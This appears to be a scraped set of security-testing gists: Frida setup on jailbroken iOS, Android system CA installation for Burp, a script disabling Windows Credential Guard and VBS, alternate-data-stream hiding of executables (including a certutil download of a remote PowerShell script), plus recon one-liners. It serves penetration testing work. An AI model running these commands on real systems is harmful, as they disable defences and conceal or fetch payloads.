| # Install curl using Cydia before using the next command | |
| # /bin/bash -c "$(curl -fsSL https://gist.githubusercontent.com/interference-security/68faea1f4a445a7814cc2518a7d1c416/raw/c715dbc30397762239b3bf2d76c60859a5c83625/frida-server-ios-all-interfaces.sh)" | |
| launchctl unload -w /Library/LaunchDaemons/re.frida.server.plist | |
| cat >/Library/LaunchDaemons/re.frida.server.plist <<EOL | |
| <?xml version="1.0" encoding="UTF-8"?> | |
| <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> | |
| <plist version="1.0"> | |
| <dict> | |
| <key>Label</key> | |
| <string>re.frida.server</string> |
#Source: https://serializethoughts.wordpress.com/2018/07/23/frida-magisk-and-selinux/
avc: denied { sigchld } for scontext=u:r:zygote:s0 tcontext=u:r:magisk:s0 tclass=process permissive=0
magiskpolicy --live "allow zygote magisk process *"
magiskpolicy --live "allow system_server magisk process *"
magiskpolicy --live "allow radio magisk process *"
Source: https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform PEM -subject_hash_old -in cacert.pem | head -1
mv cacert.pem <hash>.0
adb push <hash>.0 /sdcard/Download/
adb shell
su
mount -o rw,remount /system
mv /sdcard/Download/.0 /system/etc/security/cacerts/
| #SCRIPT TO DISABLE DEVICE GUARD & VIRTUALIZATION BASED SECURITY | |
| #https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard-manage | |
| mountvol X: /s | |
| copy %WINDIR%\System32\SecConfig.efi X:\EFI\Microsoft\Boot\SecConfig.efi /Y | |
| bcdedit /create {0cb3b571-2f2e-4343-a879-d86a476d7215} /d "DebugTool" /application osloader | |
| bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} path "\EFI\Microsoft\Boot\SecConfig.efi" | |
| bcdedit /set {bootmgr} bootsequence {0cb3b571-2f2e-4343-a879-d86a476d7215} | |
| bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} loadoptions DISABLE-LSA-ISO,DISABLE-VBS | |
| bcdedit /set {0cb3b571-2f2e-4343-a879-d86a476d7215} device partition=X: | |
| mountvol X: /d |
| #Add content to ADS | |
| type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe" | |
| extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe | |
| findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe | |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | |
| print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe | |
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | |
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
| #Source: https://blog.ropnop.com/configuring-burp-suite-with-android-nougat/ | |
| openssl x509 -inform DER -in cacert.der -out cacert.pem | |
| mv cacert.pem `openssl x509 -inform PEM -subject_hash_old -in cacert.pem |head -1`.0 | |
| adb root | |
| adb remount | |
| adb push <cert>.0 /sdcard/ | |
| mv /sdcard/<cert>.0 /system/etc/security/cacerts/ | |
| chmod 644 /system/etc/security/cacerts/<cert>.0 |
| #openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| import BaseHTTPServer, SimpleHTTPServer, logging | |
| import ssl | |
| import sys | |
| import cgi | |
| class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): | |
| def do_GET(self): | |
| #logging.error(self.headers) |
| #Nmap open ports: | |
| Linux: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort -u -n | tr "\n" "," | sed 's/,$//' | |
| Windows: grep -i ".*/tcp.*open.*" filename.nmap | cut -d "/" -f1 | sort2 -u -n | tr -s "\r\n" "," | sed "s/,$//" | |
| Powershell: Select-String -Path .\filename.nmap -Pattern ".*/tcp.*open.*" | Select-Object -ExpandProperty Line | %{$_.Split('/')[0]} | Sort-Object -Unique | %{$_.replace("`r","a")} | |
| #Linux ping check: | |
| for ip in `cat TARGETS.txt`; do data=`ping $ip -c 1 | grep -i "packet loss" | cut -d "," -f3`; echo "$ip,$data"; done | |
| AngularJS: angular.version | |
| ReactJS: React.version | |
| JQuery: $().jquery; | |
| Remove disabled attribute: | |
| html_elements = ["input", "select", "button"]; for(j=0; j<html_elements.length; j++) { for(i=0; i<document.getElementsByTagName(html_elements[j]).length; i++) { document.getElementsByTagName(html_elements[j])[i].disabled=false; } } |
| # Source: https://twitter.com/DamianRath/status/1005564997215444993 | |
| # Mount a VMware virtual disk (.vmdk) file | |
| function vmmount() { | |
| if [ ! -d "/tmp/vmmount" ]; then | |
| sudo mkdir -p /tmp/vmmount | |
| fi | |
| sudo mount $1 /tmp/vmmount/ -o ro,loop=/dev/loop1,offset=32768 -t ntfs | |
| } |